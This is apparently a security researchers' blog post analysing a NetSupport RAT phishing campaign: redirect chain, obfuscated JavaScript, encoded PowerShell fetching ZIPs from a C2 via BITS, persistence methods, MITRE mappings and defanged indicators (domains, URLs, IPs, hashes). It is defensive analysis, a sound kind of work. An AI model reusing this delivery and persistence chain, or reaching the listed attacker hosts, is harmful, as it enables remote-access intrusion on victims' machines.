NetSupport RAT hits again with new IOCs
Summary
There is a new campaign from the last day that managed to bypass EDRs while using Phishing emails to distribute the malware with Safelinks protection of Microsoft to redirect to different sites that host the malware itself.
How it’s done?
The attacker mass distributes the malware via email and uses legitimate services to bypass email protection systems while targeting the Technology sector companies.
As soon as the victim gets the email and clicks on “View Your Invoice” the victim will be redirected to another site that leads to click on the “Download Invoice” button.
As soon as the victim clicks on the button he will be redirected to “googleuserconetnt.com” which uses open-redirect to the actual website that it gets the malware from
While observing the JS file that was downloaded, we noticed that the code is obfuscated by a generic JS obfuscator (Obfuscate.io).
After making the code clear enough to understand and debug, we can see the actual steps that are being made by the JS code, and what are the C2s (Target URL).
Diving deeper…
While the malware is being executed, it’s using the “targetURL” to create an object that runs in “Wscript.shell”, and runs a hidden encoded command.
We have decoded and cleared the PS code that was in the URL, and now we can see more files that were being downloaded, where they were stored, and under what names.
Now we can see that it has multiple ZIP files that contain multiple files and how it uses “start-bitstransfer” to retrieve them from the C2 server to the client(victim’s machine).
We can also see that all of the files were retrieved from the same domain, and while browsing into it we could find an open directory.
Execution Flow
We took the decoded PS command and executed it in the CMD.
The PS creates a directory in the %AppData% called “aragdrts” and stores it inside all the files.
After storing the files, it executes automatically the “client32.exe” that sets the persistence that takes the configuration of the connection from the “client32.ini” file.
Now we can see in the execution tree that the “client32.exe” is always running and has an active connection to the attacker.
The exe file uses a few techniques for persistence:
Scheduled tasks
Startup Menu file saving
Registry Key
The scheduled task:
Startup Menu file:
Registry Key:
Now that the attacker has persistence, let’s analyze his connection.
Using the Process Monitor, we can see the TCP packets used by the exe file and what are the IPs used for the session and the remote access, using a dedicated port only for the session itself.
Analyzing the processes, we can now find all the data that we need in addition to the session of the RAT.
Computer name:
The name of the RAT itself!:
Conclusion
The NetSupport RAT we found was delivered via a phishing email with a URL that has multiple redirects that eventually download JS malware.
The malware was obfuscated and pulled malicious encoded PS script that was stored on a public URL.
The PS command has the C2s servers and uses BITS transfer to get the malicious files from the attacker’s server and execute them.
After executing the “client32.exe” file it uses the other files as configuration for the remote session for the NetSupport.
The malware uses multiple techniques for persistence to make sure that the session won’t terminate.
TTPs
Remote Access Software (T1219) — https://attack.mitre.org/techniques/T1219/
Scheduled Task/Job: Scheduled Task(T1053/005) — https://attack.mitre.org/techniques/T1053/005/
Windows Management Instrumentation(T1047) — https://attack.mitre.org/techniques/T1047/
Hide Artifacts: Hidden Files and Directories(T1564/003) — https://attack.mitre.org/techniques/T1564/003/
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder(T1547/001) — https://attack.mitre.org/techniques/T1547/001/
Hide Artifacts: Hidden Window(T1564/003) — https://attack.mitre.org/techniques/T1564/003/
Modify Registry(T1112) — https://attack.mitre.org/techniques/T1112/
Obfuscated Files or Information: Software Packing(T1406/002) — https://attack.mitre.org/techniques/T1406/002/
System Network Connections Discovery(T1049) — https://attack.mitre.org/techniques/T1049/
File and Directory Discovery(T1083) — https://attack.mitre.org/techniques/T1083/
Process Discovery(T1057) — https://attack.mitre.org/techniques/T1057/
Query Registry(T1012) — https://attack.mitre.org/techniques/T1012/
Non-Standard Port(T1571) — https://attack.mitre.org/techniques/T1571/
IOCs
ps1.dropper
hxxps://hsdiagnostico[.]com/readme.phpURLs
exe.dropper
hxxps://core-click[.]net/TVFrontend/NSM.zip
exe.dropper
hxxps://core-click[.]net/TVFrontend/remcmdstub.zip
exe.dropper
hxxps://core-click[.]net/TVFrontend/DLAA1view.zip
exe.dropper
hxxps://core-click[.]net/TVFrontend/mock/Domains:
helasirasi[.]com [ Client32 ]
geo[.]netsupportsoftware[.]com [ Client32 ]
hsdiagnostico[.]com [PowerShell]
core-click[.]net [tls,http2] (edited)IPs:
74.50.81.180
98.143.147.253
212.113.116.33
104.26.1.231:80SHA256:
[IN5632.js]
5657AEA8AFD1E0C0BDC4D3ACDBDF4C8C02ABDF4C75D4687083A6F26BAB09610D
[Client32]
42C2D35457ABCE2FEA3897BA5E569F51B74B40302FF15B782E3B20B0AA00B34E
StartUp Folder JS:
3689DDD7D45EA04F13E073F993AFB1B52D576D455D9317F446A31CC282324213OpenDir:
hxxps://core-click[.]net/TVFrontend/ / hxxps://core-click[.]net/TVFrontend/mock/filename pattern(RegEx):IN[0–9]{4}.js
Credits: Idan Tarab, Ariel Davidpur
Blog References:
https://www.sentinelone.com/blog/gotta-catch-em-all-understanding-the-netsupport-rat-campaigns-hiding-behind-pokemon-lures/